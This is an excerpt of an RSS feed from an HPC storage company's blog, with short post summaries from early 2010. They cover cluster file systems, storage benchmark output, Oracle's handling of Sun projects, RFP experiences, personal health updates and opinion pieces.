      <guid>https://blog.scalability.org/2010/04/will-there-be-a-future-for-opensolaris/</guid>
      <description>Saw this linked to from /. It&amp;rsquo;s pretty clear that Oracle is taking a deep, long, hard look at all projects within Sun, figuring out what to keep, and what to abandon. Things which have no hope of revenue generation, or driving business in general, are not likely long for this world. This brings us to OpenSolaris. This is the &amp;ldquo;open source&amp;rdquo; version of Solaris. I put it in quotes, as it may technically be an open source license in some manner of speaking, but it is fundamentally incompatible with GPL, with Artistic, with &amp;hellip; you name it.</description>
    </item>
    
    <item>
      <title>day job has an opening</title>
      <link>https://blog.scalability.org/2010/04/day-job-has-an-opening/</link>
      <pubDate>Fri, 16 Apr 2010 00:50:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/day-job-has-an-opening/</guid>
      <description>We need a systems support engineer. Have a look at our career page for more info.</description>
    </item>
    
    <item>
      <title>... and this is the low performance box ...</title>
      <link>https://blog.scalability.org/2010/04/and-this-is-the-low-performance-box/</link>
      <pubDate>Thu, 15 Apr 2010 23:07:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/and-this-is-the-low-performance-box/</guid>
      <description>more benchmark pr0n for an early spring evening. This is the day job&amp;rsquo;s slower storage target for cost-optimized storage functions.
root@dv4:~# dd if=/dev/zero of=/data/big.file ...
4096+0 records in
4096+0 records out
68719476736 bytes (69 GB) copied, 155.851 s, 441 MB/s
root@dv4:~# dd of=/dev/null if=/data/big.file ...
4096+0 records in
4096+0 records out
68719476736 bytes (69 GB) copied, 72.2219 s, 952 MB/s</description>
    </item>
    
    <item>
      <title>Wow ... just updated my Windows 7 VM ... and now it won&#39;t boot</title>
      <link>https://blog.scalability.org/2010/04/wow-just-updated-my-windows-7-vm-and-now-it-wont-boot/</link>
      <pubDate>Thu, 15 Apr 2010 19:32:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/wow-just-updated-my-windows-7-vm-and-now-it-wont-boot/</guid>
      <description>I had heard that there were some &amp;hellip; er &amp;hellip; issues with latest round of Microsoft patches. I think I have a backup of this VM, so I can roll back the changes. Sheesh. And yes, bringing up repair does in fact hang it hard. [sigh]</description>
    </item>
    
    <item>
      <title>What if the putative smoking gun wasn&#39;t, I dunno, a smoking gun?</title>
      <link>https://blog.scalability.org/2010/04/what-if-the-putative-smoking-gun-wasnt-i-dunno-a-smoking-gun/</link>
      <pubDate>Thu, 15 Apr 2010 17:41:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/what-if-the-putative-smoking-gun-wasnt-i-dunno-a-smoking-gun/</guid>
      <description>This is ridiculous. They rely upon statistical methods, misuse them to create a smoking gun, get called to the mat on it, and then &amp;hellip;
erm &amp;hellip; if you use incorrect methods of analyzing your data, ones which admit biases and errors, it&amp;rsquo;s rather hard &amp;hellip; no &amp;hellip; fundamentally impossible &amp;hellip; to make a reasonably valid claim that the &amp;ldquo;underlying data&amp;rdquo; (which you analyzed incorrectly) actually supports the conclusions which you reached.</description>
    </item>
    
    <item>
      <title>OT: Back to (almost) normal</title>
      <link>https://blog.scalability.org/2010/04/ot-back-to-almost-normal/</link>
      <pubDate>Wed, 14 Apr 2010 16:59:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/ot-back-to-almost-normal/</guid>
      <description>Stent is out, kidney stones should be gone (modulo lithotripsy). Anesthetic really took it out of me on Monday, and I&amp;rsquo;d argue, on Tuesday. Happily, after Monday night, I was off of pain meds. I don&amp;rsquo;t like stuff that messes with my head, and what they gave me definitely messed with my head. I had to restrain myself from letting my internal dialog get out on more than one occasion. Less of a truth drug, more of an incomplete thought drug.</description>
    </item>
    
    <item>
      <title>Delivered two clusters last week ...</title>
      <link>https://blog.scalability.org/2010/04/delivered-two-clusters-last-week/</link>
      <pubDate>Sun, 11 Apr 2010 16:55:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/delivered-two-clusters-last-week/</guid>
      <description>one siCluster, one specialty computing system. Added 1/8th of a PetaByte to our shipped storage. I do apologize, we&amp;rsquo;ve been busy. And, by all indications, we haven&amp;rsquo;t seen nuthin yet. Lots of business queued up for Q2, including several siClusters, several specialist computing clusters, and a number of deskside supers in the CX1 and Pegasus flavors. This doesn&amp;rsquo;t include the various Delta-V&amp;rsquo;s, JackRabbits, and other bits we have been shipping. Customers in many different fields, over fairly wide geographies.</description>
    </item>
    
    <item>
      <title>I guess this means that it is ending 15 years early?</title>
      <link>https://blog.scalability.org/2010/04/i-guess-this-means-that-it-is-ending-15-years-early/</link>
      <pubDate>Mon, 05 Apr 2010 17:39:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/i-guess-this-means-that-it-is-ending-15-years-early/</guid>
      <description>From this article one gets the impression that Windows will not be supporting Itanium anymore. Way back during the initial marketing onslaught of Itanium, it was said to be the architecture for the next 25 years for Intel. That was a decade ago. It seems to be losing software support fairly rapidly though. It&amp;rsquo;s hard to see this lasting another 15 years &amp;hellip; let alone 5 years. Linux still has Itanium support for now, but fewer users of it are out there.</description>
    </item>
    
    <item>
      <title>Rethinking how we build and invest in partnerships</title>
      <link>https://blog.scalability.org/2010/04/rethinking-how-we-build-and-invest-in-partnerships/</link>
      <pubDate>Sat, 03 Apr 2010 22:33:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/rethinking-how-we-build-and-invest-in-partnerships/</guid>
      <description>One of the things smaller companies want to do is to build alliances that are mutually beneficial &amp;hellip; be they reseller relationships, or partnerships where the sum of the two partners&amp;rsquo; offerings provides significant tangible benefits for customers. Enhance offerings, provide more value to customers. These need to be two way streets &amp;hellip; they can&amp;rsquo;t be a one way flow, if they are to have real value. We&amp;rsquo;ve built some partnerships over the past few years, some very good, some not as good, that have ranged from one way &amp;ldquo;tell us what you will do for us&amp;rdquo; scenarios to what we thought were bilateral efforts at promoting mutual business.</description>
    </item>
    
    <item>
      <title>Cluster file systems views</title>
      <link>https://blog.scalability.org/2010/04/cluster-file-systems-views/</link>
      <pubDate>Sat, 03 Apr 2010 21:19:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/cluster-file-systems-views/</guid>
      <description>We&amp;rsquo;ve had a chance to do a compare/contrast in recent months between GlusterFS and Lustre. Way back in the 1.4 Lustre time period, we helped a customer get up and going with it. I seem to remember thinking that this was simply not something I felt comfortable leaving at a customer site without a dedicated file system engineer monitoring it/dealing with it 24x7. Seriously, it needed lots of hand-holding then. Have a recent 1.</description>
    </item>
    
    <item>
      <title>Did distributed memory really win?</title>
      <link>https://blog.scalability.org/2010/04/did-distributed-memory-really-win/</link>
      <pubDate>Thu, 01 Apr 2010 23:04:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/did-distributed-memory-really-win/</guid>
      <description>About a decade or more ago, there was a &amp;ldquo;fight&amp;rdquo; if you will, for the future of high performance computing systems application level programming interfaces. This fight was between proponents of SMP and shared memory systems in general, and DMP shared-nothing approaches. In the ensuing years, several important items influenced the trajectory of application development. Shared memory models are generally easier to program. That is, it&amp;rsquo;s not hard to create something that operates reasonably well in parallel.</description>
    </item>
    
    <item>
      <title>Brittle systems</title>
      <link>https://blog.scalability.org/2010/03/brittle-systems/</link>
      <pubDate>Thu, 01 Apr 2010 03:24:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/brittle-systems/</guid>
      <description>Years ago, we helped a customer set up a Lustre 1.4.x system. This was &amp;hellip; well &amp;hellip; fun. And not in a good way. Right before the 1.6 transition, we had all sorts of problems. We skipped 1.6, and now we have set up a Lustre 1.8.2 system, and have several on quote now for various RFPs. From our experience with the 1.8.2 system &amp;hellip; I have to say, I have a sense that it is brittle.</description>
    </item>
    
    <item>
      <title>Imagine ... trying to get something as simple as a quote for Lustre support ...</title>
      <link>https://blog.scalability.org/2010/03/imagine-trying-to-get-something-as-simple-as-a-quote-for-lustre-support/</link>
      <pubDate>Thu, 01 Apr 2010 01:53:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/imagine-trying-to-get-something-as-simple-as-a-quote-for-lustre-support/</guid>
      <description>&amp;hellip; and not being able to. Seems most of the folks at Sun/Oracle haven&amp;rsquo;t heard of Lustre. I had to explain it to them on several calls yesterday. They didn&amp;rsquo;t understand why someone would want to pay for support of a GPL licensed system &amp;hellip; er &amp;hellip; ah &amp;hellip; mebbe we found some real nice gotchas, and want to get Sun to work on them, and give us a hand in ameliorating them?</description>
    </item>
    
    <item>
      <title>now OpenSolaris&#39; future in doubt</title>
      <link>https://blog.scalability.org/2010/03/now-opensolaris-future-in-doubt/</link>
      <pubDate>Wed, 31 Mar 2010 11:16:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/now-opensolaris-future-in-doubt/</guid>
      <description>Sun/Oracle has decided to change strategy around Solaris.
What does this do for Nexenta and others, with business dependencies upon OpenSolaris? We looked to OpenSolaris for a more up-to-date, less buggy Solaris. We are looking at this for one of our siCluster offerings &amp;hellip; this might have to change now. Makes sense from an Oracle perspective though.</description>
    </item>
    
    <item>
      <title>The fat lady&#39;s song is now over, and the curtain is falling</title>
      <link>https://blog.scalability.org/2010/03/the-fat-ladys-song-is-now-over-and-the-curtain-is-falling/</link>
      <pubDate>Tue, 30 Mar 2010 22:49:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/the-fat-ladys-song-is-now-over-and-the-curtain-is-falling/</guid>
      <description>SCO lost. As I had said to some local colleagues who were (for reasons I could not grasp) swayed by SCO&amp;rsquo;s arguments, this would not end well for SCO. And it didn&amp;rsquo;t. The game is effectively over. It&amp;rsquo;s time to wind down SCO as an entity in an orderly manner, to distribute the remaining value to those that SCO owes money to.</description>
    </item>
    
    <item>
      <title>This could be huge ... and disruptive</title>
      <link>https://blog.scalability.org/2010/03/this-could-be-huge-and-disruptive/</link>
      <pubDate>Mon, 29 Mar 2010 23:26:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/this-could-be-huge-and-disruptive/</guid>
      <description>ACLU seems to have taken down the BRCA gene patent from Myriad Genetics. This could actually change a chunk of the drug development business model. I am not sure if this is a good thing (the business model change), though I also didn&amp;rsquo;t think that one could patent what is effectively naturally generated prior art. Patents are about reducing theory to practice, and then providing a temporary monopoly on the use of that reduction to practice.</description>
    </item>
    
    <item>
      <title>The evolution of the data center</title>
      <link>https://blog.scalability.org/2010/03/the-evolution-of-the-data-center/</link>
      <pubDate>Sun, 28 Mar 2010 20:59:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/the-evolution-of-the-data-center/</guid>
      <description>Way back in the day, data centers used to be cold. Cold air came in, and usually in hot-aisle/cold-aisle configs, left through the back. Power per rack was measured in a few thousand watts. Cooling per rack could be mebbe one ton of AC. Up to two in the worst case. Then stuff got denser. Somewhere along the line someone decided they could run their stuff at higher temperatures. This works fine for machines that are actually mostly open space (blades, sparsely populated server systems, &amp;hellip;).</description>
    </item>
    
    <item>
      <title>There is/was a name for my pain</title>
      <link>https://blog.scalability.org/2010/03/there-iswas-a-name-for-my-pain/</link>
      <pubDate>Sun, 28 Mar 2010 20:47:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/there-iswas-a-name-for-my-pain/</guid>
      <description>&amp;hellip; yeah, the kidney stone saga continues. Had a basket extraction Wednesday, fine most of Thursday till evening, then Friday morning, they decided to remind me who was boss. Off to the ER I went, in terrible pain. Kidney stones are not life threatening, though there are times you wish death was less painful. Well, now one of 3 has been removed (second extraction), other 2 will be blown up soon.</description>
    </item>
    
    <item>
      <title>Don&#39;t share anything important or of value via Linkedin ... they will own it!</title>
      <link>https://blog.scalability.org/2010/03/dont-share-anything-important-or-of-value-via-linkedin-they-will-own-it/</link>
      <pubDate>Sun, 28 Mar 2010 15:48:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/dont-share-anything-important-or-of-value-via-linkedin-they-will-own-it/</guid>
      <description>[update] trackbacks/pingbacks temporarily disabled. Waaay too much spam. Seriously. From their updated user agreement:
They own you &amp;hellip; or at least anything you say or can be linked to you saying.</description>
    </item>
    
    <item>
      <title>On the test track with a new rev jr4</title>
      <link>https://blog.scalability.org/2010/03/on-the-test-track-with-a-new-rev-jr4/</link>
      <pubDate>Thu, 25 Mar 2010 14:27:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/on-the-test-track-with-a-new-rev-jr4/</guid>
      <description>Finishing a siCluster build for a customer. We need to see what we can do here. On the test track, and opening up the throttle wide.
[root@jr4-1 burn-in]# fio sw.fio
write: io=97,808MB, bw=1,501MB/s, iops=188, runt= 65183msec
...
Run status group 0 (all jobs):
WRITE: io=97,808MB, aggrb=1,501MB/s, minb=1,537MB/s, maxb=1,537MB/s, mint=65183msec, maxt=65183msec
[root@jr4-1 burn-in]# fio sr.fio
...
read : io=97,808MB, bw=1,975MB/s, iops=248, runt= 49521msec
Run status group 0 (all jobs):
READ: io=97,808MB, aggrb=1,975MB/s, minb=2,022MB/s, maxb=2,022MB/s, mint=49521msec, maxt=49521msec
That&amp;rsquo;s nice &amp;hellip;</description>
    </item>
    
    <item>
      <title>Fixed up some of the siCluster tools</title>
      <link>https://blog.scalability.org/2010/03/fixed-up-some-of-the-sicluster-tools/</link>
      <pubDate>Sat, 20 Mar 2010 23:41:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/fixed-up-some-of-the-sicluster-tools/</guid>
      <description>Well &amp;hellip; more correctly, fixed the data model to be saner, so that the tools would be easier to develop and use. Still a few more things to do, and one (simple) presentation abstraction to set up. The gist of it is that (apart from the automatically added nodes), adding nodes by hand should be easy. This also means by XML (not done yet, but I know how to do this), and web (basically XML or CGI like devices).</description>
    </item>
    
    <item>
      <title>Ceph client made it in to 2.6.34</title>
      <link>https://blog.scalability.org/2010/03/ceph-client-made-it-in-to-2-6-34/</link>
      <pubDate>Sat, 20 Mar 2010 00:06:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/ceph-client-made-it-in-to-2-6-34/</guid>
      <description>I&amp;rsquo;ve pointed to Ceph before. It is an object storage file system, with lots of very nice features, current and planned. As a cluster file system, it has much going for it. Combined with btrfs, and a few other things, this could be a very exciting development. This is a good thing. Stay tuned for more. We&amp;rsquo;ll have some basic testing up in a while. We&amp;rsquo;ll start at 2.6.34 to use the merged bits.</description>
    </item>
    
    <item>
      <title>Addison Snell&#39;s HPC trends: Interesting things, and a few comments we take issue with</title>
      <link>https://blog.scalability.org/2010/03/addison-snells-hpc-trends-interesting-things-and-a-few-comments-we-take-issue-with/</link>
      <pubDate>Fri, 19 Mar 2010 13:33:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/addison-snells-hpc-trends-interesting-things-and-a-few-comments-we-take-issue-with/</guid>
      <description>I found the article on InsideHPC about Addison&amp;rsquo;s presentation quite useful. The presentation is available from the link above. Some points he made, I&amp;rsquo;d like to take issue with. Specifically, page 9, he notes that Windows HPC is &amp;ldquo;still coming&amp;rdquo;. I am not too sure of this. I think it has been a multi-year, almost half decade experiment, that at some point, needs to show that its revenue is greater than the cost of that revenue.</description>
    </item>
    
    <item>
      <title>As the market changes ...</title>
      <link>https://blog.scalability.org/2010/03/as-the-market-changes/</link>
      <pubDate>Thu, 18 Mar 2010 23:42:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/as-the-market-changes/</guid>
      <description>I&amp;rsquo;ve argued for a while that accelerators are going to be a creative and destructive force in HPC. They profoundly change the cost per cycle landscape, as well as the number of cycles per unit time. I&amp;rsquo;ve pointed out here that, despite some misunderstanding of transformative technological trends, better cheaper faster is one of the most important driving forces in HPC. It is a viable business model if you can figure out how to get the appropriate traction, and it&amp;rsquo;s very hard for larger organizations to adequately respond.</description>
    </item>
    
    <item>
      <title>A good read: from Glen at Dell</title>
      <link>https://blog.scalability.org/2010/03/a-good-read-from-glen-at-dell/</link>
      <pubDate>Thu, 18 Mar 2010 22:16:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/a-good-read-from-glen-at-dell/</guid>
      <description>For those who don&amp;rsquo;t know Dr. Glen Otero, he has been a tireless advocate for all things HPC in Life sciences. His background is in computational immunology. Great to work with. He has an article on the Dell Tech Center (yeah, I know, I need to update the blogroll, I&amp;rsquo;ll do it this weekend) on a &amp;ldquo;controversy&amp;rdquo; that&amp;rsquo;s been finding fertile ground in the conspiracy theory amplifying interwebs. I highly recommend this article.</description>
    </item>
    
    <item>
      <title>Hmmm ... looks like some of these hinted results were run on our siCluster</title>
      <link>https://blog.scalability.org/2010/03/hmmm-looks-like-some-of-these-hinted-results-were-run-on-our-sicluster/</link>
      <pubDate>Mon, 15 Mar 2010 16:00:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/hmmm-looks-like-some-of-these-hinted-results-were-run-on-our-sicluster/</guid>
      <description>see this link for more. Specifically the mention of
Yeah &amp;hellip; definitely a siCluster benchmark. It&amp;rsquo;s a shame we weren&amp;rsquo;t asked for help promoting this. We have quite a few nice results with this system. The benchmarks for end user accessible streaming performance are hard for many folks to believe. You should hear some of the comments we get, such as &amp;ldquo;there is no way you can achieve these results with your setup.</description>
    </item>
    
    <item>
      <title>&#34;New&#34; File systems worth watching</title>
      <link>https://blog.scalability.org/2010/03/new-file-systems-worth-watching/</link>
      <pubDate>Sun, 14 Mar 2010 13:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/new-file-systems-worth-watching/</guid>
      <description>The day job currently has siClusters in the field with GlusterFS, Lustre, and a few other &amp;ldquo;older&amp;rdquo; parallel file systems. GlusterFS is a distributed file system with a very interesting and powerful design concept. It is under active development by a venture backed company, Gluster, Inc. I can&amp;rsquo;t say enough good things about it, and the company behind it. The day job is in a relationship with them, so you may take this information for what it&amp;rsquo;s worth, and weight it accordingly.</description>
    </item>
    
    <item>
      <title>OT: Kidney stones are not fun</title>
      <link>https://blog.scalability.org/2010/03/ot-kidney-stones-are-not-fun/</link>
      <pubDate>Fri, 12 Mar 2010 15:29:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/ot-kidney-stones-are-not-fun/</guid>
      <description>That&amp;rsquo;s how I am spending my Friday. Oh happy happy joy joy</description>
    </item>
    
    <item>
      <title>second siCluster sold and being built, third hopefully on its way to being ordered</title>
      <link>https://blog.scalability.org/2010/03/second-sicluster-sold-and-being-built-thid-hopefully-on-its-way-to-being-ordered/</link>
      <pubDate>Fri, 12 Mar 2010 15:26:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/second-sicluster-sold-and-being-built-thid-hopefully-on-its-way-to-being-ordered/</guid>
      <description>[one must not post when on pain medication &amp;hellip; nope, bad idea] somewhat exceeding our targets for Q1 on these units. I had hoped to have had an additional sales resource online by now, but the person I wanted to hire chose a different path. More power to him. Will continue to look for the right person (here in Michigan). First siCluster in Texas. University deal, GlusterFS atop it. Several more deals we are working on as well.</description>
    </item>
    
    <item>
      <title>Sale announcement coming for day job soon</title>
      <link>https://blog.scalability.org/2010/03/sale-announcement-coming-for-day-job-soon/</link>
      <pubDate>Tue, 09 Mar 2010 10:18:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/sale-announcement-coming-for-day-job-soon/</guid>
      <description>We are working on the text of this, but it is for organizations within the state of Michigan. We like our state, and we are going to give an extra discount for credit card/cash purchases over the next few months. Details to emerge. If there is interest outside of the state of Michigan, please reply below. The day job has some of the highest performing, and most reasonably priced storage available in the market today.</description>
    </item>
    
    <item>
      <title>Compute safely ... attacks on the rise</title>
      <link>https://blog.scalability.org/2010/03/compute-safely-attacks-on-the-rise/</link>
      <pubDate>Tue, 09 Mar 2010 09:36:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/compute-safely-attacks-on-the-rise/</guid>
      <description>Going this morning to a customer who had a set of systems compromised. It appears that a windows trojan did some keylogging, and someone logged in, as root, from the compromised machine. Whoops. Folks, stay safe. Don&amp;rsquo;t use passwords for ssh. Use keys. And, bluntly, seriously reconsider running any windows machine anywhere near a server/HPC resource. Our efforts to help fix their problem are going to cost this customer thousands of dollars and lots of our time.</description>
    </item>
    
    <item>
      <title>Update on the RFP bit from before</title>
      <link>https://blog.scalability.org/2010/03/update-on-the-rfp-bit-from-before/</link>
      <pubDate>Tue, 09 Mar 2010 09:29:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/update-on-the-rfp-bit-from-before/</guid>
      <description>We had been considering sending in an RFP response to a customer for a system. Long past history with this customer suggests that they are basically interested in validation and consulting from us, never really interested in purchasing from us. This is unfortunate, as we are Michigan&amp;rsquo;s only local HPC company, and they are a university in the state of Michigan purchasing HPC gear. It makes it look good for them with their higher ups to include us, even if they never award us any business.</description>
    </item>
    
    <item>
      <title>Intel success story is up</title>
      <link>https://blog.scalability.org/2010/03/intel-success-story-is-up/</link>
      <pubDate>Mon, 08 Mar 2010 17:31:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/intel-success-story-is-up/</guid>
      <description>see here. It looks like they largely ignored my edits, so some of the numbers which I fixed several times aren&amp;rsquo;t fixed in the final. Also, I don&amp;rsquo;t have the slightest clue who that person is on the document. Not a clue. Has no relation to Scalable Informatics.</description>
    </item>
    
    <item>
      <title>must remember ... most installation tools aren&#39;t that good</title>
      <link>https://blog.scalability.org/2010/03/must-remember-most-installation-tools-arent-that-good/</link>
      <pubDate>Wed, 03 Mar 2010 16:58:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/must-remember-most-installation-tools-arent-that-good/</guid>
      <description>Autoyast, kickstart, &amp;hellip; All of them suffer from the &amp;ldquo;hey let&amp;rsquo;s do it all for you&amp;rdquo;. Don&amp;rsquo;t get lured into this. Assume they are singing a siren&amp;rsquo;s song. I&amp;rsquo;ll argue that autoyast is lightyears ahead of anaconda by virtue of it not ^&amp;amp;$^*&amp;amp;) forcing you to reboot the machine in the event of a control file error; you can recover. But the point I need to stress, despite (likely) vehement protests to the contrary &amp;hellip; One should spend as little time as possible inside distro configurators, and push as much of this work to outside tools as possible.</description>
    </item>
    
    <item>
      <title>OT:  Looks like the UK physics community shares similar thoughts</title>
      <link>https://blog.scalability.org/2010/03/ot-looks-like-the-uk-physics-community-shares-similar-thoughts/</link>
      <pubDate>Mon, 01 Mar 2010 23:07:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/ot-looks-like-the-uk-physics-community-shares-similar-thoughts/</guid>
      <description>Coming from the Register &amp;hellip;
Yeah &amp;hellip; leave it to folks in the UK to say it with far more eloquence than I can. But there is more. Oh &amp;hellip; much more &amp;hellip;
Imagine if you have to tell the people giving you money to lend credence to their policy, to provide a sound theoretical and evidentiary basis for the policy &amp;hellip; that there are at minimum, nagging doubts, and at maximum, the policy is based upon weak or incorrect science &amp;hellip; imagine telling these people that they are wrong.</description>
    </item>
    
    <item>
      <title>Brief note and comic on &#34;settled science&#34; ...</title>
      <link>https://blog.scalability.org/2010/02/brief-note-and-comic-on-settled-science/</link>
      <pubDate>Sun, 28 Feb 2010 13:06:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/brief-note-and-comic-on-settled-science/</guid>
      <description>A tactic used by advocates of a particular viewpoint on anthropogenic global warming (e.g. we humans caused warming on our planet) is to make the claim that the science is &amp;ldquo;settled&amp;rdquo;. I covered this before. Specifically I pointed out that science is never &amp;hellip; ever &amp;ldquo;settled&amp;rdquo;. In fact, the very fundamental aspect of what makes science profoundly useful to humanity is that it questions and is free to question everything.</description>
    </item>
    
    <item>
      <title>we blowed up da router ...</title>
      <link>https://blog.scalability.org/2010/02/we-blowed-up-da-router/</link>
      <pubDate>Sat, 27 Feb 2010 18:37:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/we-blowed-up-da-router/</guid>
      <description>At the day job. Ok, not a complete blow up &amp;hellip; but it lost all of its config for 2 hours. It&amp;rsquo;s an appliance router, and about 4 years old. Starting to show its age. I have a &amp;ldquo;spare&amp;rdquo; (as in unused) motherboard/RAM combo, with 4x Intel GbE ports (2x PCI-x cards) that looks like it&amp;rsquo;s going to take its place. Just deciding upon the distro to do this. Looking at endian, clearos, and a few others.</description>
    </item>
    
    <item>
      <title>SLES 11 does not correctly support software RAID1 for boot disk</title>
      <link>https://blog.scalability.org/2010/02/sles-11-does-not-correctly-support-software-raid1-for-boot-disk/</link>
      <pubDate>Sat, 27 Feb 2010 04:31:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/sles-11-does-not-correctly-support-software-raid1-for-boot-disk/</guid>
      <description>I&amp;rsquo;ve been chasing down a problem for a few days on a SLES 11 load. I&amp;rsquo;ve tried basic mdadm as well as the &amp;ldquo;Intel RAID&amp;rdquo;. Modified some of the mkinitrd scripts so that it doesn&amp;rsquo;t error out, and actually builds the initrd. But it never includes the mdadm or the /etc/mdadm.conf files. So the boot with the new initrd can&amp;rsquo;t assemble the raid correctly, and can&amp;rsquo;t do a correct switchroot to the raid device.</description>
    </item>
    
    <item>
      <title>A tale of an RFP gone wrong</title>
      <link>https://blog.scalability.org/2010/02/a-tale-of-an-rfp-gone-wrong/</link>
      <pubDate>Sat, 27 Feb 2010 01:18:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/a-tale-of-an-rfp-gone-wrong/</guid>
      <description>&amp;hellip; sadly this appears to be true. Specifications were given, and we met the requirements, which entailed a demonstration of a particular level of performance over NFS. In case you aren&amp;rsquo;t sure, we demonstrated a sustained 1GB/s over NFS between 2 boxes over 10GbE last year. There aren&amp;rsquo;t too many companies that can do this. Our results were with RAID6 storage target, and an NFS client with small RAM size. Total read and write size each was much larger than either system memory.</description>
    </item>
    
    <item>
      <title>On the difference between marketing numbers, and measured numbers ...</title>
      <link>https://blog.scalability.org/2010/02/on-the-difference-between-marketing-numbers-and-measured-numbers/</link>
      <pubDate>Sat, 27 Feb 2010 01:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/on-the-difference-between-marketing-numbers-and-measured-numbers/</guid>
      <description>I should define what I mean by marketing numbers. These are best effort benchmarking numbers assuming the best of all possible test cases, with equipment functioning solely for the benchmark test purposes. These are not benchmark results you will normally achieve in practice. They represent an extremum in performance. Measured benchmark numbers are sensitive to many factors. You need to perform several tests, make sure you can construct an &amp;ldquo;average&amp;rdquo; and make an assumption about the shape of the distribution around that average.</description>
    </item>
    
    <item>
      <title>When &#34;required&#34; specifications don&#39;t matter on RFPs ...</title>
      <link>https://blog.scalability.org/2010/02/when-specifications-dont-matter-on-rfps/</link>
      <pubDate>Fri, 26 Feb 2010 15:56:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/when-specifications-dont-matter-on-rfps/</guid>
      <description>I&amp;rsquo;d mentioned this before in other contexts. But we just had an opportunity to bid on something with a very high data rate requirement. We provided a bid with a measurement indicating our performance, knowing full well we were one of very few vendors capable of this sort of performance. Yet purchasing folks appear not to take the &amp;ldquo;required&amp;rdquo; specifications into consideration. I actually feel bad for the user who is going to get a box that won&amp;rsquo;t be able to meet their needs, thanks to this process.</description>
    </item>
    
    <item>
      <title>I think that was the easiest upgrade I have ever experienced</title>
      <link>https://blog.scalability.org/2010/02/i-think-that-was-the-easiest-upgrade-i-have-ever-experienced/</link>
      <pubDate>Fri, 26 Feb 2010 03:20:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/i-think-that-was-the-easiest-upgrade-i-have-ever-experienced/</guid>
      <description>This was moving to Wordpress 2.9.2. One button. Thats it. Click it. Everything worked afterward. No drama, no complexity. No wizard. It. Just. Worked. I find this very inspirational. Makes me think we want to do this with our stack.</description>
    </item>
    
    <item>
      <title>On the importance of speed ... part 1 of likely many</title>
      <link>https://blog.scalability.org/2010/02/on-the-importance-of-speed-part-1-of-likely-many/</link>
      <pubDate>Wed, 24 Feb 2010 04:17:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/on-the-importance-of-speed-part-1-of-likely-many/</guid>
      <description>Raw end user accessible performance on data motion, data storage is rapidly becoming one of the most important problems in any HPC system. We&amp;rsquo;ve been talking about it for years, but it&amp;rsquo;s getting far more important by the day. And not just in HPC. I just spent a long time on the phone with someone from a government agency talking about their need for high performance storage, and analytical capability. We hear these refrains quite commonly: FC4/FC8 is simply too slow for their workloads, and they need to go faster.</description>
    </item>
    
    <item>
      <title>I admit it, I am conflicted</title>
      <link>https://blog.scalability.org/2010/02/i-admit-it-i-am-conflicted/</link>
      <pubDate>Wed, 24 Feb 2010 04:03:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/i-admit-it-i-am-conflicted/</guid>
      <description>We have been sent an RFP from a university we have some history with on bids. Our history has been, not winning the business. The winning bids sometimes (often) deviate wildly from the specifications as we read them. One thing I have learned from my experience with them is that the singular most important aspect of any bid is the price we present to them. You might think &amp;ldquo;well &amp;hellip; duh&amp;rdquo; but it&amp;rsquo;s more subtle than that.</description>
    </item>
    
    <item>
      <title>&#34;Sustaining&#34; strategies and startups</title>
      <link>https://blog.scalability.org/2010/02/sustaining-strategies-and-startups/</link>
      <pubDate>Tue, 23 Feb 2010 18:28:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/sustaining-strategies-and-startups/</guid>
      <description>I read an article on InsideHPC.com that I can&amp;rsquo;t say I agree with. The discussion on creative destruction is correct. You create a new market by destroying an old market. That has happened many times in HPC, by enabling better, cheaper, faster execution. If our SGI boxen of old were 1/100th the cost of the Cray Y-MP at the time, and 20% of the performance, who won that battle? In all but a vanishingly small number of cases, SGI won.</description>
    </item>
    
    <item>
      <title>back in the saddle: Arrived from Florida to 8&#43; inches of snow on my driveway</title>
